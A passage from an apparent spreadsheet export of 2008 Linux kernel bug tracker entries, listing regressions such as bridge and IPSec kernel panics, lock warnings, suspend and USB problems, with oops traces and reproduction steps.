    <t>Reproducer: 1. Boot latest linus git tree (2.6.24-rc6). 2. Run following commands: brctl addbr br0 brctl stp br0 off brctl addif br0 eth0 brcth addif br0 eth1 ifconfig br0 up ifconfig eth0 up ifconfig eth1 up 3. Try and pass traffic between hosts connected to eth0 and eth1. 4. Observe panic: UG: unable to handle kernel NULL pointer dereference at 0000000000000078 IP: [&lt;ffffffff8123b5d8&gt;] __ip_route_output_key+0x187/0x93d PGD 0 Oops: 0000 [1] SMP DEBUG_PAGEALLOC CPU 0 Modules linked in: bridge rfcomm l2cap bluetooth autofs4 sunrpc ipt_REJECT xt_tcpudp nf_conntrack_ipv4 xt_state nf_conntrack iptable_filter ip_tables ip6table_filter ip6_tables x_tables cpufreq_o] Pid: 0, comm: swapper Not tainted 2.6.25-rc6.sky2.testing #3 RIP: 0010:[&lt;ffffffff8123b5d8&gt;] [&lt;ffffffff8123b5d8&gt;] __ip_route_output_key+0x187/0x93d RSP: 0018:ffffffff815885e0 EFLAGS: 00010202 RAX: ffffffff814c1fd8 RBX: 0000000000000000 RCX: 0000000000000002 RDX: ffffffff813d57a0 RSI: 0000000000000001 RDI: 0000000000000000 RBP: ffffffff815886a0 R08: 0000000000000001 R09: 0000000000000000 R10: ffffffff8123b451 R11: ffff81006995eb40 R12: 0000000000000000 R13: ffffffff815887c8 R14: 0000000000000000 R15: ffffffff81588770 FS: 0000000000000000(0000) GS:ffffffff81416000(0000) knlGS:0000000000000000 CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b CR2: 0000000000000078 CR3: 0000000000201000 CR4: 00000000000006a0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process swapper (pid: 0, threadinfo ffffffff814c0000, task ffffffff813d57a0) Stack: ffffffff815887c8 0000000000000002 0000000000000001 ffff81007c6ac560 0000000000000002 0000000000000000 ffff8100010083b8 ffffffff81588618 ffffffff81588618 0000000181588658 0000000000000002 0000000000000246 Call Trace: &lt;IRQ&gt; [&lt;ffffffff812635b7&gt;] ? icmp_send+0x14f/0x5a4 [&lt;ffffffff8126373a&gt;] icmp_send+0x2d2/0x5a4 [&lt;ffffffff8832907f&gt;] :ipt_REJECT:reject_tg+0x45/0x396 [&lt;ffffffff882ff7a5&gt;] :ip_tables:ipt_do_table+0x4b3/0x556 [&lt;ffffffff810a3232&gt;] ? check_object+0x159/0x209 [&lt;ffffffff88305081&gt;] :iptable_filter:ipt_hook+0x18/0x1b [&lt;ffffffff81238324&gt;] nf_iterate+0x41/0x81 [&lt;ffffffff883917bb&gt;] ? :bridge:br_nf_forward_finish+0x0/0x109 [&lt;ffffffff812383e5&gt;] nf_hook_slow+0x81/0xfb [&lt;ffffffff883917bb&gt;] ? :bridge:br_nf_forward_finish+0x0/0x109 [&lt;ffffffff88391ab1&gt;] :bridge:br_nf_forward_ip+0x1ed/0x214 [&lt;ffffffff81238324&gt;] nf_iterate+0x41/0x81 [&lt;ffffffff8838cfb9&gt;] ? :bridge:br_forward_finish+0x0/0x53 [&lt;ffffffff812383e5&gt;] nf_hook_slow+0x81/0xfb [&lt;ffffffff8838cfb9&gt;] ? :bridge:br_forward_finish+0x0/0x53 [&lt;ffffffff8838d06a&gt;] :bridge:__br_forward+0x5e/0x6e [&lt;ffffffff8838d093&gt;] :bridge:br_forward+0x19/0x25 [&lt;ffffffff8838daf1&gt;] :bridge:br_handle_frame_finish+0x129/0x14d [&lt;ffffffff883921ef&gt;] :bridge:br_nf_pre_routing_finish+0x353/0x364 [&lt;ffffffff88391e9c&gt;] ? :bridge:br_nf_pre_routing_finish+0x0/0x364 [&lt;ffffffff8123844e&gt;] ? nf_hook_slow+0xea/0xfb [&lt;ffffffff88391e9c&gt;] ? :bridge:br_nf_pre_routing_finish+0x0/0x364 [&lt;ffffffff8839289e&gt;] :bridge:br_nf_pre_routing+0x69e/0x6bd [&lt;ffffffff81238324&gt;] nf_iterate+0x41/0x81 [&lt;ffffffff8838d9c8&gt;] ? :bridge:br_handle_frame_finish+0x0/0x14d [&lt;ffffffff812383e5&gt;] nf_hook_slow+0x81/0xfb [&lt;ffffffff8838d9c8&gt;] ? :bridge:br_handle_frame_finish+0x0/0x14d [&lt;ffffffff8838dccc&gt;] :bridge:br_handle_frame+0x1b7/0x1df [&lt;ffffffff8121c701&gt;] netif_receive_skb+0x33d/0x480 [&lt;ffffffff881525e0&gt;] :sky2:sky2_poll+0x969/0xcb9 [&lt;ffffffff8104af26&gt;] ? ktime_get+0x11/0x42 [&lt;ffffffff8121adc8&gt;] net_rx_action+0xd9/0x20e [&lt;ffffffff81039b87&gt;] __do_softirq+0x70/0xf1 [&lt;ffffffff8100d25c&gt;] call_softirq+0x1c/0x28 [&lt;ffffffff8100e485&gt;] do_softirq+0x39/0x8a [&lt;ffffffff810396c0&gt;] irq_exit+0x4e/0x8f [&lt;ffffffff8100e781&gt;] do_IRQ+0x145/0x167 [&lt;ffffffff8100c5e6&gt;] ret_from_intr+0x0/0xf &lt;EOI&gt; [&lt;ffffffff8103184e&gt;] ? sched_clock_idle_wakeup_event+0x44/0x6a [&lt;ffffffff81186dc8&gt;] ? acpi_idle_enter_simple+0x1af/0x220 [&lt;ffffffff81186dbe&gt;] ? acpi_idle_enter_simple+0x1a5/0x220 [&lt;ffffffff811fd94c&gt;] ? cpuidle_idle_call+0x80/0xb2 [&lt;ffffffff811fd8cc&gt;] ? cpuidle_idle_call+0x0/0xb2 [&lt;ffffffff8100b141&gt;] ? default_idle+0x0/0x73 [&lt;ffffffff8100b0f9&gt;] ? cpu_idle+0xaa/0xf2 [&lt;ffffffff81291ed6&gt;] ? rest_init+0x5a/0x5c Code: 48 85 db 0f 85 11 ff ff ff 48 c7 c2 b6 b5 23 81 be 01 00 00 00 48 c7 c7 80 37 3e 81 e8 03 a0 e1 ff e8 9f e3 df ff 45 0f b6 77 14 &lt;49&gt; 8b 44 24 78 4c 8d 9d 70 ff ff ff 41 8b 5f 10 41 ba 10 0 RIP [&lt;ffffffff8123b5d8&gt;] __ip_route_output_key+0x187/0x93d RSP &lt;ffffffff815885e0&gt; CR2: 0000000000000078 ---[ end trace 7b7b0a93664f745c ]--- Kernel panic - not syncing: Aiee, killing interrupt handler! Other info: In this case eth0 and eth1 are both sky2 cards, but I'm guessing that doesn't make any difference. I did some quick debugging and found that the panic is a result of nd_net = NULL here (line 444): 430 431 void icmp_send(struct sk_buff *skb_in, int type, int code, __be32 info) 432 { 433 struct iphdr *iph; 434 int room; 435 struct icmp_bxm icmp_param; 436 struct rtable *rt = (struct rtable *)skb_in-&gt;dst; 437 struct ipcm_cookie ipc; 438 __be32 saddr; 439 u8 tos; 440 struct net *net; 441 442 if (!rt) 443 goto out; 444 net = rt-&gt;u.dst.dev-&gt;nd_net; 445 I know that's not much info, but I didn't have a ton of time to research this one yet.</t>
  </si>
  <si>
    <t>inconsistent lock state in net_rx_action</t>
  </si>
  <si>
    <t>2.6.25-rc6 (git a4083c9271e0a697278e089f2c0b9a95363ada0a)</t>
  </si>
  <si>
    <t>2008-03-25 13:21 UTC</t>
  </si>
  <si>
    <t>2008-04-08 16:59 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24 Earliest failing kernel version: 2.6.25-rc6 (git a4083c9271e0a697278e089f2c0b9a95363ada0a) Distribution: Debian testing/unstable Hardware Environment: LG LE50 Express laptop, i386 Software Environment: Debian i386, X.org 7.3, KDE 4 Problem Description: Got this during bootup, somewhere before launching X. It only happened once, I have rebooted a few times and didn't reproduce it. Mar 25 19:48:46 better kernel: ================================= Mar 25 19:48:46 better kernel: [ INFO: inconsistent lock state ] Mar 25 19:48:46 better kernel: 2.6.25-rc6-lg #4 Mar 25 19:48:46 better kernel: --------------------------------- Mar 25 19:48:46 better kernel: inconsistent {in-softirq-W} -&gt; {softirq-on-W} usage. Mar 25 19:48:46 better kernel: syslogd/2773 [HC0[0]:SC0[0]:HE1:SE1] takes: Mar 25 19:48:46 better kernel: (&amp;napi-&gt;poll_lock){-+..}, at: [&lt;c03db11c&gt;] netpoll_poll+0xbc/0x390 Mar 25 19:48:46 better kernel: {in-softirq-W} state was registered at: Mar 25 19:48:46 better kernel: [&lt;c024171a&gt;] __lock_acquire+0x36a/0x1070 Mar 25 19:48:46 better kernel: [&lt;c024153f&gt;] __lock_acquire+0x18f/0x1070 Mar 25 19:48:46 better kernel: [&lt;c024247f&gt;] lock_acquire+0x5f/0x80 Mar 25 19:48:46 better kernel: [&lt;c03cfafc&gt;] net_rx_action+0xbc/0x1d0 Mar 25 19:48:46 better kernel: [&lt;c044a9e4&gt;] _spin_lock+0x34/0x40 Mar 25 19:48:46 better kernel: [&lt;c03cfafc&gt;] net_rx_action+0xbc/0x1d0 Mar 25 19:48:46 better kernel: [&lt;c03cfafc&gt;] net_rx_action+0xbc/0x1d0 Mar 25 19:48:46 better kernel: [&lt;c03cfaa0&gt;] net_rx_action+0x60/0x1d0 Mar 25 19:48:46 better kernel: [&lt;c02254f2&gt;] __do_softirq+0x62/0xc0 Mar 25 19:48:46 better kernel: [&lt;c0225595&gt;] do_softirq+0x45/0x50 Mar 25 19:48:46 better kernel: [&lt;c0225797&gt;] irq_exit+0x77/0x80 Mar 25 19:48:46 better kernel: [&lt;c0211a95&gt;] smp_apic_timer_interrupt+0x45/0x80 Mar 25 19:48:46 better kernel: [&lt;c02058ad&gt;] apic_timer_interrupt+0x29/0x38 Mar 25 19:48:46 better kernel: [&lt;c02058b7&gt;] apic_timer_interrupt+0x33/0x38 Mar 25 19:48:46 better kernel: [&lt;c022007b&gt;] __set_personality+0x2b/0x240 Mar 25 19:48:46 better kernel: [&lt;c0220e51&gt;] release_console_sem+0x191/0x1e0 Mar 25 19:48:46 better kernel: [&lt;c05751aa&gt;] init_netconsole+0x1da/0x1f0 Mar 25 19:48:46 better kernel: [&lt;c0558700&gt;] kernel_init+0x90/0x270 Mar 25 19:48:46 better kernel: [&lt;c0204ecf&gt;] restore_nocheck+0x12/0x15 Mar 25 19:48:46 better kernel: [&lt;c0240eec&gt;] trace_hardirqs_on+0x9c/0x110 Mar 25 19:48:46 better kernel: [&lt;c0558670&gt;] kernel_init+0x0/0x270 Mar 25 19:48:46 better kernel: [&lt;c0558670&gt;] kernel_init+0x0/0x270 Mar 25 19:48:46 better kernel: [&lt;c0205a23&gt;] kernel_thread_helper+0x7/0x14 Mar 25 19:48:46 better kernel: [&lt;ffffffff&gt;] 0xffffffff Mar 25 19:48:46 better kernel: irq event stamp: 174638 Mar 25 19:48:46 better kernel: hardirqs last enabled at (174637): [&lt;c0204ecf&gt;] restore_nocheck+0x12/0x15 Mar 25 19:48:46 better kernel: hardirqs last disabled at (174638): [&lt;c044ac65&gt;] _spin_lock_irqsave+0x15/0x60 Mar 25 19:48:46 better kernel: softirqs last enabled at (174636): [&lt;c0225595&gt;] do_softirq+0x45/0x50 Mar 25 19:48:46 better kernel: softirqs last disabled at (174629): [&lt;c0225595&gt;] do_softirq+0x45/0x50 Mar 25 19:48:46 better kernel: Mar 25 19:48:46 better kernel: other info that might help us debug this: Mar 25 19:48:46 better kernel: 3 locks held by syslogd/2773: Mar 25 19:48:46 better kernel: #0: (&amp;tty-&gt;atomic_write_lock){--..}, at: [&lt;c036c699&gt;] tty_write_lock+0x19/0x50 Mar 25 19:48:46 better kernel: #1: (target_list_lock){--..}, at: [&lt;c0399c0d&gt;] write_msg+0x2d/0xd0 Mar 25 19:48:46 better kernel: #2: (&amp;napi-&gt;poll_lock){-+..}, at: [&lt;c03db11c&gt;] netpoll_poll+0xbc/0x390 Mar 25 19:48:46 better kernel: Mar 25 19:48:46 better kernel: stack backtrace: Mar 25 19:48:46 better kernel: Pid: 2773, comm: syslogd Not tainted 2.6.25-rc6-lg #4 Mar 25 19:48:46 better kernel: [&lt;c023ff6f&gt;] print_usage_bug+0x15f/0x170 Mar 25 19:48:46 better kernel: [&lt;c0240bd1&gt;] mark_lock+0x401/0x590 Mar 25 19:48:46 better kernel: [&lt;c0240d98&gt;] mark_held_locks+0x38/0x70 Mar 25 19:48:46 better kernel: [&lt;c0398a43&gt;] sky2_poll+0x7a3/0xad0 Mar 25 19:48:46 better kernel: [&lt;c0240eec&gt;] trace_hardirqs_on+0x9c/0x110 Mar 25 19:48:46 better kernel: [&lt;c0398a43&gt;] sky2_poll+0x7a3/0xad0 Mar 25 19:48:46 better kernel: [&lt;c03db11c&gt;] netpoll_poll+0xbc/0x390 Mar 25 19:48:46 better kernel: [&lt;c044adb2&gt;] _spin_trylock+0x42/0x80 Mar 25 19:48:46 better kernel: [&lt;c03db0d3&gt;] netpoll_poll+0x73/0x390 Mar 25 19:48:46 better kernel: [&lt;c03db51f&gt;] netpoll_send_skb+0x12f/0x1d0 Mar 25 19:48:46 better kernel: [&lt;c0399c7c&gt;] write_msg+0x9c/0xd0 Mar 25 19:48:46 better kernel: [&lt;c0220bd4&gt;] __call_console_drivers+0x54/0x70 Mar 25 19:48:46 better kernel: [&lt;c0220d90&gt;] release_console_sem+0xd0/0x1e0 Mar 25 19:48:46 better kernel: [&lt;c037a8d9&gt;] do_con_write+0x189/0x1a80 Mar 25 19:48:46 better kernel: [&lt;c0240d98&gt;] mark_held_locks+0x38/0x70 Mar 25 19:48:46 better kernel: [&lt;c044affc&gt;] _spin_unlock_irqrestore+0x4c/0x60 Mar 25 19:48:46 better kernel: [&lt;c0240eec&gt;] trace_hardirqs_on+0x9c/0x110 Mar 25 19:48:46 better kernel: [&lt;c044afe7&gt;] _spin_unlock_irqrestore+0x37/0x60 Mar 25 19:48:46 better kernel: [&lt;c037c1f7&gt;] con_put_char+0x27/0x30 Mar 25 19:48:46 better kernel: [&lt;c036e6ed&gt;] opost+0xad/0x220 Mar 25 19:48:46 better kernel: [&lt;c036f08b&gt;] write_chan+0x1ab/0x350 Mar 25 19:48:46 better kernel: [&lt;c021a790&gt;] default_wake_function+0x0/0x10 Mar 25 19:48:46 better kernel: [&lt;c036c87b&gt;] tty_write+0x13b/0x1d0 Mar 25 19:48:47 better kernel: [&lt;c036eee0&gt;] write_chan+0x0/0x350 Mar 25 19:48:47 better kernel: [&lt;c02802e3&gt;] do_loop_readv_writev+0x33/0x60 Mar 25 19:48:47 better kernel: [&lt;c0280d50&gt;] do_readv_writev+0x170/0x180 Mar 25 19:48:47 better kernel: [&lt;c036c740&gt;] tty_write+0x0/0x1d0 Mar 25 19:48:47 better kernel: [&lt;c0280d9c&gt;] vfs_writev+0x3c/0x50 Mar 25 19:48:47 better kernel: [&lt;c0281261&gt;] sys_writev+0x41/0x70 Mar 25 19:48:47 better kernel: [&lt;c0204de6&gt;] sysenter_past_esp+0x5f/0xa5 Mar 25 19:48:47 better kernel: =======================</t>
  </si>
  <si>
    <t>[regression] performance drop for glx</t>
  </si>
  <si>
    <t>2008-03-25 15:11 UTC</t>
  </si>
  <si>
    <t>2009-03-23 09:31 UTC</t>
  </si>
  <si>
    <t>after commit 4138cc3418f5eaa7524ff8e927102863f1ba0ea5 i expirience some grafik related perfomance issues. I used glxgears for test. before this patch: 1281.005 FPS and after: 765.000 FPS latest tested commit a4083c9271e0a697278e089f2c0b9a95363ada0a still hase bad performance. I use Pentium D with 2GB RAM, Grafick: i945G, ICH7</t>
  </si>
  <si>
    <t>2.6.24.4</t>
  </si>
  <si>
    <t>Mircea Gherzan</t>
  </si>
  <si>
    <t>xbox driver moves axis y backwards</t>
  </si>
  <si>
    <t>2008-03-26 20:51 UTC</t>
  </si>
  <si>
    <t>Charles Joseph Christie II</t>
  </si>
  <si>
    <t>2008-04-07 21:08 UTC</t>
  </si>
  <si>
    <t>Earliest failing kernel version: 2.6.2* something Distribution: Gentoo Linux Hardware Environment: 64-bit Intel chipset Software Environment: 64-bit 2.6.24 kernel Problem Description: The official Xbox and Xbox360 controllers both seem to exhibit the behavior of reversing the up and down on the Y axis on the left analog stick. It would be nice to get this fixed, as I would like to actually USE my $50 controller. Steps to reproduce: Plug an Xbox controller in. Play a game. Up and down will be reversed.</t>
  </si>
  <si>
    <t>No analog sound after s3 resume</t>
  </si>
  <si>
    <t>2.6.24 &amp; 2.6.25</t>
  </si>
  <si>
    <t>2008-03-27 01:09 UTC</t>
  </si>
  <si>
    <t>2009-03-23 11:56 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.23.xx Earliest failing kernel version:?? Distribution: minimyth (http://www.linpvr.org/) Hardware Environment: Abit AN-M2HD (MCP630a + ALC888) Software Environment: 2.6.25-rc6, ALSA1.0.16rc2 Problem Description: Problem is releted only to analog outputs. SPDIF works OK. After S3 resume there is no sound on analog outputs. Last proper working kernel was 2.6.23.xx. Issue is present in 2.6.24.x &amp; 2.6.25.x kernels Steps to reproduce: boot machine, play sound on analog outputs, suspend, resume, check sound on analog outs.</t>
  </si>
  <si>
    <t>suspend order - again</t>
  </si>
  <si>
    <t>2008-03-27 10:07 UTC</t>
  </si>
  <si>
    <t>2008-04-01 13:52 UTC</t>
  </si>
  <si>
    <t>Subject : suspend order - again Submitter : Shaohua Li &lt;shaohua.li@intel.com&gt; Date : 2008-03-14 09:22 References : http://marc.info/?l=linux-acpi&amp;m=120549574009914&amp;w=4 Handled-By : Shaohua Li &lt;shaohua.li@intel.com&gt; Patch : http://marc.info/?l=linux-acpi&amp;m=120649617317396&amp;w=4 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>103 sec. latency: sync_page() with TASK_UNINTERRUPTIBLE (?) (bisected)</t>
  </si>
  <si>
    <t>2008-03-27 14:34 UTC</t>
  </si>
  <si>
    <t>2008-03-27 17:22 UTC</t>
  </si>
  <si>
    <t>Subject : 103 sec. latency: sync_page() with TASK_UNINTERRUPTIBLE (?) (bisected) Submitter : "Carlos R. Mafra" &lt;crmafra2@gmail.com&gt; Date : 2008-03-23 00:47 References : http://lkml.org/lkml/2008/3/22/211 Handled-By : "KOSAKI Motohiro" &lt;kosaki.motohiro@jp.fujitsu.com&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>USB HID problems after resume</t>
  </si>
  <si>
    <t>2.6.25-rc7</t>
  </si>
  <si>
    <t>2008-03-27 15:03 UTC</t>
  </si>
  <si>
    <t>2008-04-03 13:38 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.25-rc7: Ugh. Submitter : Mark Lord &lt;lkml@rtr.ca&gt; Date : 2008-03-27 11:29 References : http://lkml.org/lkml/2008/3/27/228 Handled-By : Greg KH &lt;gregkh@suse.de&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.25-rc7: V4L ioctl oops</t>
  </si>
  <si>
    <t>2008-03-30 11:17 UTC</t>
  </si>
  <si>
    <t>2008-04-02 15:32 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.25-rc7: V4L ioctl oops Submitter : Meelis Roos &lt;mroos@linux.ee&gt; Date : 2008-03-29 12:38 References : http://lkml.org/lkml/2008/3/29/24 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.25-rc7: warn_on_slowpath triggered</t>
  </si>
  <si>
    <t>2008-03-30 11:34 UTC</t>
  </si>
  <si>
    <t>2008-05-01 17:51 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.25-rc7: warn_on_slowpath triggered Submitter : Bob Tracy &lt;rct@frus.com&gt; Date : 2008-03-29 17:29 References : http://lkml.org/lkml/2008/3/29/125 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>regression breaks lowmem reserved RAM</t>
  </si>
  <si>
    <t>commit 419c434c35614609fd0c79d335c134bf4b88b30b</t>
  </si>
  <si>
    <t>2008-03-30 11:45 UTC</t>
  </si>
  <si>
    <t>2008-04-02 15:10 UTC</t>
  </si>
  <si>
    <t>Subject : regression breaks lowmem reserved RAM Submitter : Andrea Arcangeli &lt;andrea@qumranet.com&gt; Date : 2008-03-28 20:49 References : http://lkml.org/lkml/2008/3/28/372 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>The never ending BEEEEP/__smp_call_function_mask with 2.6.25-rc7</t>
  </si>
  <si>
    <t>2008-03-30 12:23 UTC</t>
  </si>
  <si>
    <t>2008-09-10 13:19 UTC</t>
  </si>
  <si>
    <t>Subject : The never ending BEEEEP/__smp_call_function_mask with 2.6.25-rc7 Submitter : Chr &lt;chunkeey@web.de&gt; Date : 2008-03-30 21:09 References : http://lkml.org/lkml/2008/3/30/87 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2008-03-31 08:15 UTC</t>
  </si>
  <si>
    <t>Marek Piechaczek</t>
  </si>
  <si>
    <t>2008-04-11 14:46 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: all 2.6 Distribution: Hardware Environment: Software Environment: Problem Description: On big-endian machines getsockopt fails for optlen==1 when returned value is 255. Eg. after calling unsigned char ttl = 255; socklen_t len = sizeof(ttl); setsockopt(socket, IPPROTO_IP, IP_MULTICAST_TTL, &amp;ttl, &amp;len); the following call will fail: getsockopt(socket, IPPROTO_IP, IP_MULTICAST_TTL, &amp;ttl, &amp;len); "ttl" returned will be 0. It's because of bug in /net/ipv4/ip_sockglue.c: static int do_ip_getsockopt(struct sock *sk, int level, int optname, char __user *optval, int __user *optlen) .... if (len &lt; sizeof(int) &amp;&amp; len &gt; 0 &amp;&amp; val&gt;=0 &amp;&amp; val&lt;255) { unsigned char ucval = (unsigned char)val; len = 1; if (put_user(len, optlen)) return -EFAULT; if (copy_to_user(optval,&amp;ucval,1)) return -EFAULT; } else { len = min_t(unsigned int, sizeof(int), len); if (put_user(len, optlen)) return -EFAULT; if (copy_to_user(optval,&amp;val,len)) return -EFAULT; } return 0; } The comparision in if-statement should be: if (len &lt; sizeof(int) &amp;&amp; len &gt; 0 &amp;&amp; val&gt;=0 &amp;&amp; val&lt;=255) Otherwise on big-endian machines copy_to_user(optval,&amp;val,len) routine copies first (highest) byte which is 0 in that case. This bug does not occur on low-endian machines since copy_to_user(optval,&amp;val,len) copies right (lowest) byte in that case.</t>
  </si>
  <si>
    <t>mac80211 drivers stop transmitting data after ifconfig down; ifconfig up</t>
  </si>
  <si>
    <t>2008-03-31 12:50 UTC</t>
  </si>
  <si>
    <t>Thomas Bächler</t>
  </si>
  <si>
    <t>2008-07-02 06:58 UTC</t>
  </si>
  <si>
    <t>When you are associated to a wireless network and do ifconfig $IF down; ifconfig $IF up, no data is being transmitted anymore. The "RUNNING" flag disappears from the ifconfig output. However, the card stays associated, indicating that data transfer should be possible. The behaviour should be: 1) everything should work as before (this was the case for example in the ipw3945 driver) 2) the driver should disassociate from the network The current state (card stays associated, but no data is being transferred) is inconsistent and unintuitive. Reference: http://permalink.gmane.org/gmane.linux.kernel.wireless.general/12972</t>
  </si>
  <si>
    <t>slub compile error</t>
  </si>
  <si>
    <t>2.6.25-rc7-git</t>
  </si>
  <si>
    <t>2008-03-31 14:46 UTC</t>
  </si>
  <si>
    <t>2008-04-04 02:44 UTC</t>
  </si>
  <si>
    <t>Subject : slub compile error Submitter : Toralf Förster &lt;toralf.foerster@gmx.de&gt; References : http://lkml.org/lkml/2008/3/31/120 Caused-By : Christoph Lameter &lt;clameter@sgi.com&gt; commit 53625b4204753b904addd40ca96d9ba802e6977d Handled-By : Christoph Lameter &lt;clameter@sgi.com&gt; Patch : http://lkml.org/lkml/2008/3/31/261</t>
  </si>
  <si>
    <t>sym53c8xx: weird behavior with udev</t>
  </si>
  <si>
    <t>2008-04-01 01:01 UTC</t>
  </si>
  <si>
    <t>2008-05-17 08:52 UTC</t>
  </si>
  <si>
    <t>scsi_drivers-sym53c8xx</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.22.9 Earliest failing kernel version: 2.6.23 Distribution: Gentoo Hardware Environment: sparc64 (Sun Blade 100) Software Environment: Problem Description: Since kernel 2.6.23, I have been having problems getting the sungem network device working on one of my two Blade 100s, see bug #10273. After debugging this, I found that this seems to be somehow related to sym53c8xx and udev. If I allow udev to load sym53c8xx during boot, the attached disks work fine but the network does not work at all. While the device is up and mii-diag says there is link beat, no packets can be sent or received, and attempts to use the network result in "network unreachable" errors. If I blacklist sym53c8xx in /etc/modprobe.d/blacklist, let the machine boot normally and then manually load sym53c8xx after everything is settled, both the scsi disks and the network appear to work fine. None of this happened in kernel versions 2.6.22.9 and earlier, 2.6.23 was the first to start showing this behavior, and it still persists in 2.6.24. I've tried playing with the option CONFIG_SCSI_SYM53C8XX_DMA_ADDRESSING_MODE as that is what seems to have changed between kernel versions 2.6.22 and 2.6.23. The recommended value for my machine is 0, but I have tried the other possible values without result. I have also tried toggling CONFIG_SCSI_SYM53C8XX_MMIO, also without result. Steps to reproduce: Let udev load sym53c8xx in kernel 2.6.23 or newer.</t>
  </si>
  <si>
    <t>IPSec tunnel kernel panic</t>
  </si>
  <si>
    <t>2.6.24.3 2.6.24.4</t>
  </si>
  <si>
    <t>2008-04-01 11:44 UTC</t>
  </si>
  <si>
    <t>Yuri Chislov</t>
  </si>
  <si>
    <t>2008-09-26 05:18 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: 2.6.24.3 Distribution: Hardware Environment: Software Environment: Problem Description: Steps to reproduce: Configured IPSec tunnel between two Linux with same kernel versions. One of machines, connected via ADSL fall with kernel panic. 2.6.24.4: kernel BUG at include/linux/skbuff.h:948! invalid opcode: 0000 [#1] SMP Modules linked in: esp4 ah4 xfrm4_mode_tunnel ppp_synctty ppp_async crc_ccitt pp p_generic slhc deflate zlib_deflate geode_aes aes_i586 aes_generic blowfish des_ generic cbc ecb blkcipher sha256_generic sha1_generic crypto_null af_key af_pack et ipt_ULOG xt_state xt_tcpudp iptable_filter ipt_MASQUERADE iptable_nat nf_nat nf_conntrack_ipv4 nf_conntrack ip_tables x_tables binfmt_misc dm_mod sr_mod cdro m generic ide_core evdev e1000 ehci_hcd pata_marvell uhci_hcd e1000e intel_agp a gpgart sg usbcore unix Pid: 2867, comm: pppoe Not tainted (2.6.24.4-1 #1) EIP: 0060:[&lt;dfb3d50b&gt;] EFLAGS: 00010293 CPU: 0 EIP is at esp_input+0x3b2/0x3b6 [esp4] EAX: 00000591 EBX: 00000000 ECX: 00000010 EDX: dd65b380 ESI: 00000005 EDI: 00000014 EBP: dd71da08 ESP: dd71d9a4 DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 Process pppoe (pid: 2867, ti=dd71c000 task=de990ab0 task.ti=dd71c000) Stack: 00000000 000249f0 dd71d990 dd65b380 de948a00 dd71d9a4 de3a3e40 dd79dc80 0000000c 00000598 00000000 dd564840 00000001 00000008 00000000 dd79dc80 dd79dca8 00000000 dd733380 00000000 de03c300 04050002 de948a00 00000032 Call Trace: [&lt;c02dcd3a&gt;] xfrm4_rcv_encap+0xba/0x426 [&lt;df860475&gt;] nf_nat_adjust+0x0/0x33 [iptable_nat] [&lt;c02a6566&gt;] nf_iterate+0x56/0x7a [&lt;c02a65ff&gt;] nf_hook_slow+0x4d/0xbe [&lt;c02ac08a&gt;] ip_local_deliver_finish+0x0/0x1f8 [&lt;c02dd0c1&gt;] xfrm4_rcv+0x1b/0x1f [&lt;c02ac17f&gt;] ip_local_deliver_finish+0xf5/0x1f8 [&lt;c02abe48&gt;] ip_rcv_finish+0xe8/0x32a [&lt;c02ac558&gt;] ip_rcv+0x1e3/0x265 [&lt;c02abd60&gt;] ip_rcv_finish+0x0/0x32a [&lt;c02ac375&gt;] ip_rcv+0x0/0x265 [&lt;c028fdbb&gt;] netif_receive_skb+0x298/0x3b7 [&lt;dfc817b7&gt;] ppp_receive_nonmp_frame+0x2c7/0x709 [ppp_generic] [&lt;c02923df&gt;] process_backlog+0x63/0xc4 [&lt;c0291e73&gt;] net_rx_action+0x78/0x139 [&lt;dfc7bb02&gt;] ppp_async_process+0x1b/0x5e [ppp_async] [&lt;c011e652&gt;] __do_softirq+0x72/0xdf [&lt;c011e6f6&gt;] do_softirq+0x37/0x39 [&lt;c011e886&gt;] local_bh_enable_ip+0x42/0x44 [&lt;dfa769ab&gt;] packet_poll+0x54/0x62 [af_packet] [&lt;c0284d1f&gt;] sock_poll+0xc/0xe [&lt;c0166b02&gt;] do_select+0x251/0x46b [&lt;c016732e&gt;] __pollwait+0x0/0xcf [&lt;c0115061&gt;] default_wake_function+0x0/0x8 [&lt;c0115061&gt;] default_wake_function+0x0/0x8 [&lt;c0115061&gt;] default_wake_function+0x0/0x8 [&lt;c0115061&gt;] default_wake_function+0x0/0x8 [&lt;df8e6bed&gt;] e1000_clean_rx_irq+0x0/0x4ce [e1000] [&lt;df8e536b&gt;] e1000_xmit_frame+0x716/0xba2 [e1000] [&lt;c02e709f&gt;] _spin_lock_bh+0x8/0x18 [&lt;dfc7b3f9&gt;] ppp_async_push+0x1f7/0x424 [ppp_async] [&lt;c0158ac8&gt;] cache_alloc_refill+0x6f/0x4ff [&lt;dfc7bb32&gt;] ppp_async_process+0x4b/0x5e [ppp_async] [&lt;c028c994&gt;] memcpy_toiovec+0x37/0x4e [&lt;c028cf81&gt;] skb_copy_datagram_iovec+0x146/0x1fa [&lt;c028d39d&gt;] skb_recv_datagram+0x146/0x219 [&lt;c028b4cd&gt;] skb_release_all+0x50/0x114 [&lt;c011e801&gt;] local_bh_enable+0x4f/0x92 [&lt;dfa76223&gt;] 